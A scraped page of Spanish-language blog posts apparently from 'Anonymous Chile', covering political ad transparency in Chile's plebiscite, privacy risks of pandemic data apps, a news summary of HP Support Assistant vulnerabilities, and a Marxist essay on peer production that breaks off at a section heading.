En ese sentido, es mucho más relevante el anuncio de implementación de la herramienta de transparencia de anuncios políticos, que obliga a los anunciantes a entregar información sobre su identidad y locación, y archiva los anuncios por siete años, con la información de gastos asociada. Esta herramienta está actualmente disponible en Estados Unidos, el Reino Unido y Brasil, donde su uso es obligatorio. En enero de 2019, la compañía anunció que una versión voluntaria de esta herramienta sería implementada en el resto del mundo en junio de ese año. Esa es la versión actualmente disponible en Chile. Y aunque la versión obligatoria de la herramienta dista de ser perfecta, se trata de una herramienta mucho más efectiva que su contraparte voluntaria a la hora de fiscalizar que las reglas del proceso eleccionario se cumplan debidamente.

A lo anterior hay que agregar las limitaciones en las capacidades legales efectivas que tiene Servel de fiscalizar la propaganda electoral del plebiscito. Al fijar las reglas para el proceso constituyente mediante una reforma a la actual Constitución, el Congreso chileno delimitó expresamente las reglas electorales aplicables, incluyendo las leyes sobre votaciones, sobre padrón electoral y sobre partidos políticos, pero dejando fuera la Ley de Gasto Electoral. De esa forma, Servel solamente está facultado para fiscalizar los gastos realizados por los partidos políticos, y no los esfuerzos que los privados puedan realizar por fuera de las colectividades inscritas, lo que además está protegido por la libertad de expresión.

Ante esto, surgen preguntas relevantes respecto al modo en que este problema requiere ser abordado, la normativa vigente, las capacidades de fiscalización reales de Servel, y el rol que deben cumplir las plataformas que proveen servicios en línea. Por un lado, es completamente razonable hacer prevalecer el derecho a la libertad de expresión en internet, sobre todo de cara a un proceso eleccionario. Por otro lado, es cierto que resulta necesario aportar mayor transparencia al proceso, generando mecanismos cada vez más efectivos que permitan fiscalizar las fuentes de financiamiento de las campañas. Esa es una información que por sí misma es relevante para las y los votantes a la hora de tomar decisiones, no tan solo el día de las elecciones, sino también en su vida cotidiana. En ese sentido, mayor proactividad por parte de los proveedores de servicios en línea sería importante, pues finalmente ellos son los que tienen los recursos, el conocimiento y —más importante— el control sobre las plataformas, en tanto el desarrollo de herramientas técnicas de transparencia es algo que solamente puede ocurrir dentro de las compañías.

Junto con lo anterior, parece importante robustecer tanto el mandato de Servel como los recursos con los que cuenta para llevarlo a cabo. El vacío que plantea el plebiscito respecto al rol de Servel da cuenta de un problema que quizás es mayor, y que tiene que ver con las distintas formas que hoy puede adoptar la propaganda electoral –y en general el discurso político– y la distancia que esta realidad plantea frente a una legislación creada pensando en las particularidades del mundo físico y material. No es suficiente con limitar el período y las condiciones en las cuales algunas formas de propaganda se materializan en medios analógicos, sino que es también necesario que existan herramientas para asegurar que el flujo de información y expresión en los medios digitales pueda ser conocido en períodos eleccionarios. A ello se suma la necesidad de escudriñar la forma en que esa publicidad puede ser dirigida a grupos determinados o a personas individuales, en probable infracción de los derechos sobre sus datos personales a través del perfilamiento de los mismos en base a la información que almacena la plataforma de sus interacciones en ella, y que puede ser explotada como un servicio secundario a quienes paguen por hacer más efectiva la distribución de sus mensajes.

Se hace necesario hacer partícipe a la sociedad en su conjunto de estos debates, aportando información que permita separar aquello que es problemático de lo que no lo es, y favoreciendo que las personas puedan adoptar posturas críticas e informadas que ayuden al debate. Se hace urgente una dieta de información con etiquetas tan claras como los ya célebres discos pare negros, y así no permitir que el público se encandile con voladeros de luces que vengan del mercado de ideas amparado por la libertad de expresión.

Privacidad y autodefensa digital durante la pandemia: Evitemos acabar en 1984

Publicada el 21/04/2020 - 02/08/2021 por Anonymous Chile

En los momentos más graves de la historia, ha salido a la luz lo mejor y lo peor de la sociedad. La crisis del coronavirus no está siendo diferente. Ante el avance imparable de la enfermedad, millones de personas se han desvivido por ayudar a sus prójimos. Pero también se han multiplicado los ciberataques con ransomware a las pymes, las fake news y la generación de malware dirigido a robar a otros seres humanos que han sido víctimas de ERTES o del COVID-19.

Tanto los buenos como los malos han sacado el máximo provecho de su talento para afrontar la crisis. Sin embargo, hay una consecuencis de esta pandemia que la hace ser novedosa, porque muchas de las soluciones que se están proponiendo para combatirla podrían convertirse en graves amenazas para la sociedad.

Es el caso de las cientos de iniciativas digitales que se están desarrollando para hacer frente a la enfermedad. Muchas de ellas se basan en almacenar y analizar una ingente cantidad de datos personales y gestionarlos como Big Data. Su funcionalidad y su beneficio directo son claros: ayudan a contener la expansión del virus y a dar a los enfermos la asistencia sanitaria que necesitan.

Sin embargo, el hecho de que la información personal, sobre todo la que se refiere a la salud de las personas, esté en manos de gobiernos y se esté compartiendo en abierto entre distintos organismos públicos y privados, es un arma de doble filo que ya conocemos en dictaduras y en la ciencia ficción orwelliana.

Aun así, también la hemos visto usarse de forma diligente en otros países como Corea del Sur.

El problema es que, tal y como está desarrollada gran parte de estas aplicaciones, se vulnera gravemente el derecho a la protección de la información privada de millones de personas. Aunque se trata de datos almacenados de forma desestructurada, es relativamente fácil monitorizar la vida de un individuo o de un colectivo social.

Hervé Lambert, Global Consumer Operations Manager de Panda Security.

Un consenso necesario entre empresas y estados

“Si no se legisla correctamente cuando toda esta situación acabe para que haya un consenso general sobre el uso de estos datos, podríamos estar asistiendo a una nueva era en la que los Estados lo sepan todo de sus ciudadanos”, añade Lambert.

Así se hizo en Corea del Sur durante el primer y casi inadvertido zarpazo del Coronavirus en Oriente durante 2012 y, justo por ello, es el país que mejor ha contenido la curva de contagios y de muertos por la enfermedad en 2020.

Sin embargo, hay que tener en cuenta que en Occidente, la regulación siempre va más lenta que las necesidades reales del mercado y, como se está viendo en este caso, que lo que requiere la sociedad ante una crisis sanitaria de esta magnitud.

Por ello, el regulador no puede ni debe obstaculizar los avances tecnológicos que se están desarrollando para hacer frente al COVID-19. En este sentido, “es imperativo que, una vez haya terminado la crisis, las empresas privadas y también los organismos públicos nos sentemos para crear las bases de una alianza para gestionar los datos de las personas de forma sensata”.

La Agencia Española de la Protección de Datos (AEPD) asegura en un comunicado que ya está “colaborando con las autoridades competentes facilitándoles criterios que permitan compatibilizar” la gestión de los datos de las personas para luchar contra la epidemia y, al mismo tiempo, minimizar el riesgo de que el Estado se convierta en un Gran Hermano que lo sabe todo de sus ciudadanos como en 1984 de George Orwell.

Para ello, hace falta altura de miras entre los Gobiernos europeos para que sepan seguir los pasos que ha dado Corea del Sur para atajar la crisis sanitaria. Sin embargo, no debemos pasar por alto el pensamiento surcoreano de “priorizar la seguridad de toda la sociedad” por encima del inalienable Derecho a la Privacidad.

¿Qué pasa con los datos de la infancia?

En otro orden de circunstancias, está toda la información que se está compartiendo sobre las empresas durante estas semanas de aislamiento. La falta de previsión y de medidas de ciberseguridad entre prácticamente toda la población y en la mayor parte de grandes, medianas y pequeñas empresas, hace que mucho de lo que estamos haciendo durante el confinamiento quede registrado en alguna ‘nube’ sin nuestro conocimiento.

Los Estados y las empresas tienen mucho que hacer y que decir a este respecto. “Pero, las personas, de forma individual, también debemos actuar de forma diligente. Al igual que no se nos ocurre desnudarnos con la ventana abierta frente a nuestros vecinos, tampoco se nos debería ocurrir acceder a nuestros datos bancarios o al servidor de nuestra empresa sin conectarnos a una red segura generada por una VPN”, apunta Hervé Lambert.

El caso de la falta de seguridad en el sector de la Educación es igual de flagrante. Los educadores, impulsados por su vocación de no dejar a nadie atrás están generando blogs, moodles y doodles a diestro y siniestro. Su intención es la nobleza de mantener la atención de sus estudiantes.

Sin embargo, es alarmante la cantidad de blogs y sitios web generados por escuelas y colegios que han surgido en estos días en los que la ciberseguridad brilla por su absoluta ausencia.

Ningún colegio debería tener en abierto los sistemas educativos que están compartiendo con los padres de sus estudiantes. Aunque parezca increíble, para un hacker con solo un poco de pericia es verdaderamente fácil localizar a un menor o a sus padres por medio de técnicas denominadas de ‘ingeniería social’.

Por ello, es de vital importancia que no solo eduquemos a nuestros hijos en la diligencia a la hora de conectarse al mundo a través de Internet. También tenemos que invertir en prevenir que estas situaciones vuelvan a darse entre nuestro profesorado, que es uno de los activos más importantes, si no el más, de los que dispone nuestra sociedad.

Como en todo, la virtud se encuentra en el término medio. Como decía Albert Einstein, “es en la crisis donde aflora lo mejor de cada uno, porque sin crisis todo viento es caricia”. Esperamos que una vez haya amainado la tormenta del coronavirus seamos capaces de alcanzar un consenso en el que la tecnología esté a la altura de nuestra sociedad.

Evitemos manejar información sensible en nuestra computadora HP con Windows

Publicada el 21/04/2020 - 02/08/2021 por Anonymous Chile

Los especialistas en servicios de seguridad en la nube y usuarios siempre han señalado los múltiples inconvenientes relacionados con el software preinstalado en los dispositivos tecnológicos. Una reciente investigación ha revelado diversas fallas de seguridad en el software preinstalado en los equipos de cómputo HP con sistema operativo Windows.

La herramienta señalada en la investigación es HP Support Assistant, responsable del monitoreo de estado del dispositivo y la automatización de los controladores. Los especialistas aseguran que esta herramienta contiene diez serias vulnerabilidades de seguridad, incluyendo dos fallas críticas de eliminación de archivos arbitrarios, cinco fallas de escalada de privilegios locales y tres errores de ejecución remota de código.

Los especialistas señalan que este software se encuentra precargado en todos los dispositivos Windows 10, así como algunos sistemas Windows 8 y Windows 7. Otros fabricantes, como Dell y Lenovo, emplean software similar, práctica conocida como “bloatware”.

La iteración de HP permite a los usuarios verificar las más reciebntes actualizaciones de software y controladores, además de ofrecer herramientas de diagnóstico que pueden solucionar algunos inconvenientes de hardware y software. Sin embargo, los especialistas en servicios de seguridad en la nube señalan que, a diferencia de otras herramientas de software, estas aplicaciones no cuentan con un nivel de seguridad adecuado, lo que podría generar múltiples inconvenientes de seguridad.

Después de que las fallas fueran reveladas, HP comenzó a trabajar en las actualizaciones correspondientes, aunque aún quedan tres vulnerabilidades sin actualizar. El riesgo de seguridad sigue latente, pues estas fallas podrían permitir a los actores de amenazas alcanzar elevados privilegios en un sistema afectado.

A pesar de que las actualizaciones faltantes habían sido anunciadas para finales de marzo, la irrupción del coronavirus ha retrasado algunos de los proyectos de HP. Ante esta situación, los especialistas en servicios de seguridad en la nube recomiendan desinstalar esta herramienta para mitigar el riesgo de explotación hasta que la compañía lance los parches de seguridad.

El Instituto Internacional de Seguridad Cibernética (IICS) también recomienda actualizar este software a la más reciente versión disponible, que ya cuenta con al menos seis vulnerabilidades corregidas. Más información sobre las vulnerabilidades corregidas y los errores que aún faltan por solucionar se encuentra disponible en las plataformas oficiales de la compañía.

La producción de pares como alternativa al capitalismo: un nuevo horizonte comunista

Publicada el 20/04/2020 - 14/03/2022 por Anonymous Chile

La crisis actual del capitalismo ha provocado protestas, revueltas y revoluciones en grandes partes del planeta involucrando a 3 mil millones de habitantes. Incluso la Time Magazine hizo del “Protestante” el personaje del año. La portada decía: De la Primavera Árabe a Atenas, de Occupy Wall Street a Moscú. China, Chile, España, Inglaterra, Italia, India, Israel, Irán y Francia, entre muchos otros lugares, pueden también contarse entre los semilleros de las protestas sociales recientes.

Los movimientos de protesta han puesto las alternativas al capitalismo en la agenda histórica (Hardt & Negri, 2011). Este artículo argumenta que un sector de los trabajadores cognitivos ya ha creado un nuevo modo de producción llamado de pares (P2P) como una alternativa viable al capitalismo. Aunque aun se encuentra en su fase emergente y dominado por el capitalismo, el P2P demuestra claramente los contornos principales de una sociedad igualitaria. El hecho mismo de que sectores del activismo P2P y los trabajadores de las TIC estén –a su vez– activamente involucrados en las protestas puede funcionar como un buen catalizador que conecte el P2P con estos movimientos.

En la producción de pares, los productores producen bienes colectivamente a través de la participación voluntaria en un sistema productivo descentralizado, de red. Los voluntarios escogen las tareas que realizan; la cantidad de tiempo que dedican a la producción colectiva; el tiempo y lugar de su actividad productiva. En términos de distribución, cualquiera en el mundo puede usar los productos gratuitamente de acuerdo a sus propias necesidades, sin tener en cuenta su propia contribución (Benkler, 2006). Este modo de producción es muy similar al que Marx (1978c, 1978b) describió como el comunismo avanzado. También ha sido llamado cibercomunismo (Barbrook, 2000; Kleiner, 2010; Moglen, 2003).

El P2P y la fase avanzada del comunismo de Marx

Como la historia del modo de producción de pares contemporáneo ya ha sido escrita (Raymond, 2001; Söderberg, 2007; Weber, 2004) haré una breve pausa para definir dos momentos definitorios de esta historia, por un lado la invención de la licencia GPL (Licencia Pública General, en inglés) y el Software Libre (SL) por Richard Stallman en 1984 y por el otro la invención del sistema de cooperación colectiva voluntaria en línea por Linus Torvalds en 1991.

Stallman creó la Free Software Foundation liberando código bajo una licencia llamada Licencia Pública General. La GPL garantizaba cuatro libertades: correr el programa con cualquier propósito; estudiarlo y personalizarlo; redistribuir copias gratuitamente o por un precio razonable; y cambiar y mejorar el programa. Stallman incluyó la así llamada cláusula “copyleft” en la GPL. De acuerdo con esta cláusula cualquier código que incluya componentes derivados de código bajo la GPL deberá ser también liberado bajo la misma licencia en su totalidad. El copyleft es la negación dialéctica del copyright, porque a la vez que lo preserva lo está aboliendo (Stallman, Lessig, & Gay, 2002).

El significado de la GPL descansa en el hecho de haber formulado por primera vez en la historia de la humanidad un derecho de propiedad que engloba a todo el mundo. Los comunes han existido desde la concepción misma de la humanidad en varias formas y dentro de varias civilizaciones (Marx, 1965; Ostrom, 1990). Pero todos ellos, a excepción del común del conocimiento, han estado siempre territorializados y pertenecido a comunidades, tribus o estados particulares. Por lo tanto y como regla general, los forasteros eran excluidos.

GPL creó un común globalmente desterritorializado, incluyendo a casi todos. Sólo excluye a aquellos usuarios que rechazan liberar sus propios productos bajo GPL. GPL ha sido modificada bajo el nombre de Open Source para acomodar los intereses comerciales. Este nuevo protocolo sólo obliga a los usuarios a liberar bajo la GPL sólo aquellos componentes de sus productos que deriven de otros bajo la GPL. El propietario puede mantener otros componentes como propiedad privada. Si el Open Source corrompe a la GPL o facilita la expansión del P2P es tema de debate entre Stallman y sus seguidores, por un lado y los defensores del Open Source por el otro (Raymond, 2001; Weber, 2004).

Para los propósitos de este artículo nos enfocaremos en la GPL, porque representa la esencia de los nuevos comunes del conocimiento globales y universales. La mayoría de las formas de conocimiento han sido comunes universales. Merton (1979) argumentó que la ciencia requiere una forma de producción y distribución comunista. Aunque han habido excepciones a esta regla (chamanes, magos, clérigos y artesanos, entre otros, intentaron mantener en secreto sus conocimientos o transferirlos sólo a selectos individuos), fue el capitalismo y sus correspondientes regimenes de copyright y patentes los que cercaron sistemáticamente aquellas formas de conocimiento que podrían dar ganancias (Boyle, 1996). Mientras el conocimiento se volvía un factor importante del capitalismo informacional, crecía dramáticamente un régimen de copyright draconiano (Lessig, 2005). GNU GPL fue una estrategia jurídico-productiva pionera en producir un común global de conocimiento y en protegerlo de la invasión del capitalismo. En este sentido, la iniciativa de Stallman fue un hito fundamental en la lucha de los trabajadores cognitivos contra el capitalismo informacional (Söderberg, 2007).

Fue, sin embargo, Linus Torvalds quien tomó este desarrollo local y lo llevó a un nivel global al hacer un uso completo del potencial distributivo de la Internet. La producción de Linux fue una verdadera revolución en la organización de la cooperación entre un gran número de productores. Marx argumentó que cualquier conocimiento científico es producto del trabajo colectivo (Marx, 1981, p. 199), porque cada científico construye sobre los logros de otros anteriores. Pero este aspecto colectivo de la ciencia no fue el resultado de una cooperación conciente y simultánea entre los científicos sino la transferencia de conocimiento contingente en un eje de tiempo y espacio.

La invención de Torvalds, al usar Internet, trascendió las barreras del tiempo y el espacio. Por lo tanto, volvió posible una cooperación simultánea, conciente, voluntaria, coordinada y global entre un gran número de productores. La combinación de la licencia GPL y el modo de cooperación de Linux representa la esencia del modo de producción P2P, que coincide con los principios generales de la forma avanzada del comunismo descrita por Marx.

  • No habrá equivalencia entre la contribución de cada individuo a la producción social y su parte del total de productos sociales. Contribuirán de acuerdo a su habilidad y usarán de los productos de acuerdo a sus necesidades. El dinero como la medida cuantitativa del valor desaparecerá (Marx, 1978b). El dinero no juega un rol interno en el sistema de pares, aunque todavía constituye su contexto externo y le inserta presión.
  • En el comunismo avanzado de Marx, la división del trabajo y consigo el estado y el mercado, desaparecen (Marx, 1978c, 1978b). En el P2P la división del trabajo es reemplazada por la distribución del trabajo (Weber, 2004) y las lógicas del estado y del mercado son cuestionadas (ver debajo).
  • El comunismo avanzado que Marx (1978c) previó, trascendería la alienación no sólo al abolir la lógica de la equivalencia cuantitativa en el ámbito del intercambio entre el individuo y la sociedad, y también entre individuos y la división del trabajo, sino también al permitir y habilitar a los individuos a usar los medios de producción socialmente producidos para materializar sus propios poderes creativos. Las investigaciones etnográficas muestran que la creatividad y el reconocimiento de los pares se encuentran entre las motivaciones más fuertes de los productores P2P (Weber, 2004). Söderberg (2007) también muestra cómo la creatividad P2P trasciende la alienación.

En este punto podemos hacer las siguientes preguntas:

  1. ¿Es el P2P realmente un nuevo modo de producción histórico o sólo un apéndice del modo de producción capitalista?
  2. ¿Cuál es su relación con el modo de producción capitalista?
  3. ¿Hasta qué punto el P2P puede ser aplicado a la producción material?
  4. ¿Cuáles son las posibilidades de que reemplace o desplace del todo al modo de producción capitalista?

El P2P como un nuevo modo de producción histórico

Definamos brevemente el concepto de modo de producción según Marx (1978d). La producción es un proceso por el cual los humanos producen bienes pre-diseñados. Estos bienes pueden ser materiales, como el pan; servicios, como la salud y la educación; o información y conocimiento, como el software. Las fuerzas productivas son los humanos, sus conocimientos y habilidades, las herramientas que usan, el material sobre el que actúan y otras condiciones materiales de la producción, como la energía, los edificios, etc. Las relaciones de producción son relaciones “definitivas” e “indispensables” entre humanos que se corresponden con el estadio material de las fuerzas productivas. Las relaciones de propiedad son expresiones legales de las relaciones de producción. Un modo de producción es la totalidad de las fuerzas de producción y las relaciones de producción.

Las fuerzas productivas de la producción de pares corresponden a lo que Manuel Castells (2010, pp. 70-72) define como el Paradigma Tecnológico de la Información (PTI). El PTI enfatiza el trabajo informal en red, su flexibilidad y se caracteriza por el hecho de que la tecnología actúa sobre la información y la información sobre la tecnología así como por la integración de varias tecnologías como la microelectrónica, las telecomunicaciones, la electrónica óptica y las computadoras en un sistema más amplio. Es importante señalar que los trabajadores cognitivos son un componente importante, o el más importante, de las fuerzas productivas del PTI.

La centralidad de la información/conocimiento y la estructura de la red contradicen inherentemente las relaciones capitalistas de producción. La lógica de la red requiere que el conocimiento producido en cada nodo de una red integrada globalmente deba fluir libre y horizontalmente en todas las direcciones hacia todos los demás nodos. El conocimiento es un bien no rival, que puede reproducirse sin costos extras. Es también universal dado que el mismo ítem de conocimiento puede ser utilizado simultáneamente por todo el planeta.

Aun así el capitalismo previene el libre flujo del conocimiento en todas las direcciones de la red. Es verdad que el modo de producción capitalista, adaptándose al PTI, se ha vuelto global y ha adoptado crecientemente una forma de red. Sin embargo, la suma de todos los vínculos potenciales de la red excede dramáticamente la suma de los vínculos de las redes globales del capital. Por lo tanto, el potencial de la red en tanto fuerza producitiva paradigmática de nuestro tiempo, excede al modo de producción capitalista (Hardt & Negri, 2000).

Lo mismo es cierto para el conocimiento-información, la otra fuerza productiva paradigmática de nuestra era. El conocimiento es universal y no rival. El capital esculpe para sí una selecta subred de la red total: la red global de acumulación de capital. El flujo de conocimiento-capital está cercado por esta subred. Aun dentro de esta subred el flujo de conocimiento no es libre. En primer lugar, en la competencia entre las diferentes multinacionales, formas significativas de conocimiento se han vuelto secretas y son celosamente mantenidas dentro del alcance de un pequeño número de diseñadores e ingenieros de empresas particulares. En segundo lugar, el conocimiento-mercancía sólo puede moverse de un nodo a otro si es intercambiado por dinero. En otras palabras la forma mercancía en sí misma es una forma de cercamiento.

El PTI también contradice profundamente la organización capitalista de la producción. La red es una red abierta en la que cada nodo puede conectarse con cualquier otro nodo inmediata y horizontalmente.

Esto implica que las unidades de producción pueden desterritorializarse globalmente en redes abiertas y asociadas de productores directos en donde cooperan entre sí horizontalmente –aunque la mediación de una autoridad coordinadora puede ser necesaria– y producir bienes variados. Esto no es otra cosa que la organización social del P2P cognitivo. Linux, el modelo inaugural del P2P, es en efecto una instancia práctica de tal red de cooperación. Wikipedia es el otro ejemplo. Este modelo puede aplicarse a cualquier forma de producción cognitiva y en gran medida a la producción material a través de la automatización (Bauwens, 2011).

Quiebre radical con el capitalismo

Mientras que práctica y empíricamente el modo de producción de pares aun se encuentra bajo el dominio del capitalismo y depende en gran medida de éste (adquiriendo computadoras y otros materiales y servicios y utilizando su infraestructura), su lógica contradice radicalmente aquella del capital. Más arriba he descrito brevemente aquellos aspectos del P2P que se corresponden con aquello que Marx entendía por comunismo. Todos estos aspectos contradicen la lógica del capital. Demostraré aquí cómo la lógica del P2P contradice profundamente a la división capitalista del trabajo, porque la división del trabajo es el componente clave de todo modo de producción. Dejenme enfatizar que en el P2P tenemos una distribución del trabajo y no una división del trabajo (Weber, 2004). Los modos de cooperación entre pares y la distribución de sus productos vuelven superfluas las micro (entre unidades de producción separadas) y macro (entre diferentes unidades) divisiones capitalistas del trabajo.

El P2P y la micro-división capitalista del trabajo

En el nivel empresarial, la administración capitalista impone la división técnica del trabajo entre los trabajadores. Los capitalistas (o sus administradores) reunen a los trabajadores bajo el mismo techo y los colocan en posiciones particulares en la línea de producción para poder administrarlos. La cooperación entre los trabajadores es un producto del capital (Marx, 1976). La invención de la maquinaria perfeccionó la división técnica del trabajo, llevando al taylorismo donde el capital, utilizando el método científico, estableció un despotismo completo sobre el trabajo (Braverman, 1974). Los académicos del post-fordismo argumentan que éste ha trascendido al taylorismo al mejorar las habilidades de los trabajadores e involucrándolos en la toma de decisiones (Amin, 1994). Se han hecho proclamas similares sobre la así llamada japonización (Kaplinsky, 1988). Tales proclamas son por lo menos controversiales (Castells, 2010). Muchos argumentan que el taylorismo todavía es la forma dominante de la organización del proceso laboral (Huws, 2003; Tomaney, 1994).

Sin importar la validez de la hipótesis post-fordista, podemos decir con seguridad que el trabajo aun está compartimentado en espacios cerrados y es despóticamente administrado por los representantes del capital. Mientras que un pequeño y selecto grupo de trabajadores pueden disfrutar una autonomía parcial, el total del proceso laboral es centralizado por los administradores que integran el trabajo de trabajadores separados en un proceso total de trabajo cooperativo. Andre Gorz (1999, ch. 2), un proponente de la hipótesis post-fordista, dice que el post-fordismo ha reemplazado al despotismo impersonal y mecanizado del taylorismo por nuevas formas de esclavitud personal. Los productores individuales no eligen sus tareas, ni el ritmo, tiempo y lugar de su trabajo. En otras palabras el proceso de trabajo es micro-territorializado tanto espacial como temporalmente. En este sentido el contraste con la cooperación P2P no puede ser mayor. En la cooperación P2P los procesos laborales están globalmente desterritorializados, en términos tanto temporales como espaciales.

El incremento cada vez más complejo de micro-divisiones jerárquicas del trabajo que habían sido un factor importante detrás del crecimiento de la productividad del trabajo industrial se ha vuelto una barrera para la productividad del trabajo cognitivo. Brook (1975) demostró que en una organización centralizada el incremento del número de ingenieros que trabajan sobre un problema particular de software decrece la eficacia al crear complejidades innecesarias en un rango exponencial. Raymond (2001) demostró que esto no era cierto en la cooperación descentralizada de la red P2P. Aquí, el incremento en el número de trabajadores incrementa la eficacia y mejora el producto. Esta hipótesis puede ser cierta para todas las formas de producción cognitiva.

La cooperación voluntaria en red subvierte la lógica arriba-abajo de la administración capitalista que también es la lógica del estado capitalista. No obstante, existe una forma “centralizada” de control en el P2P. El desarrollo de cada proyecto es controlado en última instancia por el o los individuos que lo lanzaron a la red. En las bifurcaciones, ellos tienen la palabra final, aunque existe el espacio para el debate extensivo. Sin embargo, si los demás no están contentos con las decisiones tomadas por ese liderazgo, tienen el derecho de tomar el proyecto entero y desarrollarlo en la dirección que les plazca. Si esta forma de “centralización” es un impacto del entorno capitalista, o inherente a la producción de pares, es un tema que requiere un examen crítico (O’Neil, 2009).

El P2P y la macro-división capitalista del trabajo

En la macro-división capitalista del trabajo las diferentes unidades productivas no están conectadas inmediatamente entre sí sino a través de la mediación del mercado. Los trabajadores intercambian su trabajo por salarios y los productos de su labor se convierten en mercancías propiedad de los capitalistas que las venden en el mercado. Es solo a través de esta vía que el trabajo de los productores inmediatos de varias unidades y ramas de la producción se conectan entre sí, volviéndose partes del total del trabajo social de la sociedad. Cada unidad productiva se vuelve un componente del total de la macro-división capitalista del trabajo en tanto produce mercancías que son vendidas (Marx, 1978a). Los productos del P2P son principalmente comunes universales.

Aunque la GPL permite la venta de productos, por sentido común nadie paga por un producto que está disponible gratuitamente. El uso comercial de los productos del P2P no los convierte en mercancías porque el usuario no paga por ellos y por lo tanto no ingresa en los costos de sus propias mercancías. De esto se sigue que el trabajo total que es gastado globalmente en la actualidad en las diferentes formas del P2P está por fuera de la división social del trabajo bajo el capitalismo y lo circunscribe. En el estadio actual el P2P también está circunscrito por la forma mercancía ya que partes mayoritarias de los medios de producción son mercancías ellos mismos y los contribuidores al P2P deben ganar dinero. Una sociedad de pares no es compatible con el dinero y la mercancía. La forma mercancía circunscribe inherentemente las libertades que la GPL garantiza (este punto puede ser alcanzado también utilizando la teoría del valor de Marx; sin embargo, requiere una argumentación más larga de lo que el espacio disponible permite).

En resumen, las fuerzas productivas del PTI combinadas con la forma de cooperación descentralizada de red, la ausencia del trabajo asalariado, la contribución voluntaria y la forma común de los productos constituyen las características principales del modo de producción P2P. Aunque el modo de producción de pares es todavía un fenómeno emergente, su lógica es claramente diferente de la del capitalismo y ha sido creada como respuesta a los requerimientos de las nuevas fuerzas productivas. Por lo tanto, su significado histórico, urgencia y novedad puedan difícilmente exagerarse. El modo de producción capitalista es una barrera para la realización de las potencialidades del conocimiento en la era de Internet. Limita la creatividad humana y el desarrollo de los trabajadores cognitivos en general. Por lo tanto no es una coincidencia que un sector de los trabajadores cognitivos se haya rebelado contra las relaciones capitalistas de producción al lanzar el P2P. Como argumenta Söderberg (2007) esta es una forma de lucha de clases.

La relación del modo de producción de pares con el capitalismo

La nueva producción social consiste en islas en el mar del modo de producción capitalista. La relación entre ambas, como se señaló más arriba, es de dependencia mutua y antagonismo. La producción social depende del capitalismo para adquirir algunos de los medios de producción y de los salarios de sus contribuidores, mientras que el capitalismo utiliza los comunes de la producción social gratuitamente.

Los marxistas distinguen entre el modo de producción y la formación social. La formación social es un sistema integrado social, económico, ideológico y cultural. Puede consistir en más de un modo de producción. No obstante, un modo de producción domina sobre los demás y sus imperativos definen las características generales de la formación social. En este sentido podemos hablar de formaciones sociales feudales y capitalistas como distintas de los modos de producción feudal y capitalista. Aunque el modo de producción dominante domina a los otros modos de producción, no puede borrar sus lógicas específicas. La continua tensión y dependencia entre el modo de producción dominante y sus subordinados convierten en fenómenos dinámicos, desequilibrados y complejos a las formaciones sociales.

La formación social capitalista ha pasado por tres fases parcialmente solapadas: la emergente, la dominante y la declinante. En la fase emergente (1850-1950) el modo de producción capitalista dominó mundialmente a los modos de producción feudal, doméstico y otros pre-capitalistas, extrayendo trabajo y valor de ellos (Mandel, 1970, Capítulo 2). En la segunda fase (1950-1980) el modo de producción capitalista erosionó profundamente los modos pre-capitalistas y los reemplazó con el modo de producción capitalista. El capitalismo se expandió intensivamente, penetrando en nuevos dominios de la actividad productiva como los servicios, y extensivamente, conquistando el globo entero. La tercera fase (1980 a la actualidad) se caracteriza por la emergencia del PTI como modo social de producción dentro de la formación social capitalista. Este período ha sido descrito en términos tales como la “Sociedad Red” (Castells, 2010), “Imperio” (Hardt & Negri, 2000), etc.

Aunque el modo de producción de pares se encuentra bajo el dominio del modo de producción capitalista, su situación frente a éste es diferente a la de los modos de producción pre-capitalistas. Mientras que en las primeras dos fases el capitalismo representaba las nuevas fuerzas productivas, en la tercera fase es el P2P el nuevo y emergente modo de producción y el capitalismo es el que está en decadencia. Si el P2P domina el capitalismo tendremos la fase emergente de la formación social de pares. No quiero dar la impresión que la victoria del P2P sobre el capitalismo es un proceso evolucionario suave o inevitable. Es totalmente contingente a las orientaciones y consecuencias de la lucha social actual, particularmente la lucha de las comunidades de pares. Ya que retomaré este aspecto en la última sección, la siguiente explora si la producción social actual puede generalizarse a la producción material.

¿Puede la producción y distribución material ser organizada por el modo de producción P2P?

En la actualidad el modo social de producción (de pares) se ha extendido más allá del software, cubriendo otras esferas de la producción de símbolos y signos. Bauwens (2011) muestra que el P2P está ganando terreno en el diseño y la manufactura. Adrian Bowyer (2006) y sus colaboradores lanzaron un proyecto abierto para la producción de una impresora tridimensional en el 2005 que ahora se reproduce a sí misma. En efecto, el modo de producción de pares puede extenderse a la mayoría de las ramas de la producción material. La automatización será el pilar de esta transformación, aunque la automatización no es una pre-condición necesaria del P2P material. En una producción totalmente automatizada, el factor cognitivo de la producción de pares (investigación y desarrollo, diseño y software) pondrá la producción material bajo el dominio del P2P. La automatización capitalista lleva a la pérdida de puestos de trabajo y a la degradación del trabajo. La automatización no necesitará tener estos impactos en la formación social de pares. El empleo no tiene sentido y la automatización ofrece tiempo libre a la humanidad. Este tiempo puede ser dedicado a la producción colectiva de conocimiento, educación y salud.

Como los recursos materiales estratégicos son limitados y están desperdigados desigualmente por el globo, una distribución global justa de tales recursos será un desafío importante para la sociedad de pares global. El límite natural de las materias primas pondrá un límite a la riqueza material y requerirá reglas de distribución. Pero el criterio para la distribución en la comunidad global y dentro de cada comunidad local no puede ser la contribución al trabajo hecha por individuos y comunidades, porque el trabajo cognitivo es globalmente colectivo, no posee valor de cambio y no produce valor de cambio. Sólo las necesidades de las comunidades e individuos definidas democráticamente entre y dentro de las comunidades puede ser el criterio para la distribución. No puedo especular sobre las reglas de una distribución global de materias primas pero parece razonable asumir que si el factor cognitivo de la producción se convertirá en un común libre para toda la humanidad, entonces los recursos naturales estratégicos deberán seguir el mismo camino. El movimiento ecologista ya ha concebido a la tierra y la atmósfera como un común global (Rabinowitz, 2010). La propiedad común y el uso de la naturaleza, particularmente la tierra, por la humanidad entera será el desafío último para la sociedad de pares y por ese mismo motivo para la humanidad. Por lo tanto, la protección de la naturaleza se convertirá en la prioridad principal de una sociedad de pares global.

¿Cuáles son las posibilidades de establecer una sociedad de pares? El rol de la lucha

